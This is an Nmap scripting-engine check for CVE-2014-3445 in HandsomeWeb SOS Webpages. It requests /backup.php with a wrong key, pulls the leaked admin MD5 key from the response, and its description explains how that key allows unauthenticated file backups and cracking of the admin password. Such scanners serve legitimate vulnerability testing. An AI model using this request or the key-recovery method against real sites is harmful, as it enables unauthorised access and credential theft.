local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local vulns = require "vulns"

description = [[
Tests for the CVE-2014-3445 vulnerability in HandsomeWeb SOS Webpages, which
allows an unauthenticated user to access administrative functions, such as
backing up of key files within the CMS. This is done by appending the
following to a domain using the software affected.

  /backup.php?a=2&k=somerandomkey

Where "a" is the file number to back up and "k" is the MD5key used to
authenticate the administrator; however if "k" does not match the
correct key, rather than disallowing the unauthenticated user to back up
the file the service will provide the user with the correct key. For
example:

  "Failure, wrong key. The right key is 5f17aca1ae2edea0f145e884116371a5"

Using this new key in the url above, will allow the user to perform the
backup of files. In addition to this, the key is generated by the code
  md5(ADMIN_USERNAME.md5(admin_password)),
which makes it possible to decrypt the admin password and gain further
control over the site.

References: https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-3445/
]]

---
-- @usage
-- nmap -sV --script http-vuln-cve2014-3445 <target>
-- @output
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- | http-vuln-cve2014-3445.nse:
-- |   VULNERABLE:
-- |   Unauthenticated Backup and Password Disclosure in HandsomeWeb SOS Webpages
-- |     State: VULNERABLE
-- |     Description:
-- |       A vulnerability that allows an unauthenticated user to access
-- |       administrative functions such as backing up of key files within
-- |       the CMS. In addition, the vulnerability exposes the MD5 of the
-- |       admin username and password, which makes it possible to gain full
-- |       control over the site.
-- |
-- |     Affected versions: v1.1.11 and earlier.
-- |     Disclosure date: 26-05-2014
-- |     References: https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-3445/
-- |_
--
---

author = "Claudiu Perta <claudiu.perta@gmail.com>"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"exploit","vuln","intrusive"}

portrule = shortport.http

action = function(host, port)
  local vuln = {
    title = 'Unathenticated Backup and Password Disclosure in HandsomeWeb SOS Webpages',
    IDS = { CVE='CVE-2014-3445'},
    state = vulns.STATE.NOT_VULN, -- default
    description = [[
      A vulnerability that allows an unauthenticated user to access
      administrative functions such as backing up of key files within
      the CMS. In addition, the vulnerability exposes the MD5 of the
      admin username and password, which makes it possible to gain full
      control over the site.

      Affected versions: v1.1.11 and earlier.
      Vulnerability discovered by Freakyclown.
    ]],
    references = {
      'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-3445/',
    },
    dates = {
      disclosure = {year = '2014', month = '05', day = '26'},
    },
  }

  local report = vulns.Report:new(SCRIPT_NAME, host, port)
  local uri = "/backup.php?a=2&k=somerandomkey"
  local response = http.get(host, port, uri)

  if response then
    local key = response.body:match("The right key is %S+")
    if  key == nil then
      stdnse.print_debug(1, "%s: Unknown response", SCRIPT_NAME)
    else
      stdnse.print_debug(1, "Matched key :%s", key)
      vuln.state = vulns.STATE.EXPLOIT
    end
  end

  return report:make_output(vuln)
end